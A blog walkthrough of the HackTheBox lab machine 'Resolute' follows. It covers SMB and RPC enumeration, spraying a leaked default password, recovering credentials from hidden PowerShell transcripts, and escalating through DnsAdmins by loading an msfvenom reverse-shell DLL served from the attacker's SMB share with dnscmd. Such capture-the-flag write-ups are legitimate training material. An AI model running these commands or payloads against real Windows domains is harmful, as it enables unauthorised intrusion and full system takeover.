HacktheBox Resolute Walkthrough

In this article we are going to solve another boot2root challenge Resolute from hackthebox .


walkthrough


As usual we kick off with nmap using to find open ports and services running in the target system using the command


sudo nmap -sC -sV -o nmap.txt -Pn 10.10.10.169

so many ports are open , we start with SMB Enumeration and to find some open SMB Shares we used the command

it looks like anonymous login is successful but we have no SMB shares , we also tried some NULL Authentication but got nothing , next we tried another tool rpcclient as


rpcclient -U '' 10.10.10.169

and after searching on the internet we found some useful commands we can use and here we have used enumdomusers

we have a list of usernames and this can be useful in bruteforcing the password .

To gain some more information we decided to use another tool enum4linux


enum4linux 10.10.10.169

This looks quite similar to the above output we got from rpcclient but here we have some useful message , Account created. Password set to Welcome123!

Okay we have usernames and a password we decided to do bruteforce against SMB by using msfconsole

we have set all the required and necessary options and also I don't like my terminal to be filled with lots of data so verbose set to false , and we got a hit for user melanie as password Welcome123! , So till now we have found 0 SMB shares so there is no use of login into SMB .

Now we try to connect to the machine as user melanie by using evil-winrm


sudo evil-winrm -i 10.10.10.169 -u melanie -p Welcome123!

Now we can read the user flag in Desktop directory :)

it's time for some enumeration and manual searching and after some time we found something interesting in C:\

dir command doesn't give us useful result so we run the command ls -hidden to check for hidden directories and found one as PSTranscripts , we change our directory to this PSTr....and there we found a another hidden directory and inside that hidden direcotry we have a .txt file lets try to read that file

okay we have username as ryan and password which is very long ( I didn't feel like typing it here ;)

again we used the evil-winrm tool to connect to the machine as user ryan

we run the command whoami /groups to check for all the groups and found this interesting group DnsAdmins and we searched online about this group and found that this can be used to get RCE , so what we are going to do is

  1. Making a dll payload that sends a reverse shell back to our machine with msfvenom.

  2. Serving it using SMB Server to make it available to the Windows machine.And, we will also setup a netcat listener to catch our reverse shell.

  3. Importing that dll in the DNS Server.

  4. Restarting the DNS Server so that it loads the dll file.

command used to prepare the payload


msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.15.28 LPORT=777 --platform=windows -f dll > haclabs.dll

Now we need to server this payload and for that we used the SMBServer , script can be found in our kali-linux system

here rest is the name of our SMB Share.

Next we need to import the dll into dns server and for that we have used the command


dnscmd resolute /config /serverlevelplugindll \\10.10.15.28\rest\haclabs.dll

after that we have to restart the dns server so that dns server can load our dll payload/file

and we have setup a listener on port 7777 to catch our reverse shell


we are admin user now and can read the final flag , hope you like the walkthrough :)



Subscribe to HacLabs newsletter

Get priority notification on the release of the latest articles.

  • YouTube
  • Twitter
  • Instagram
  • Linkedin

© 2020 by HacLabs.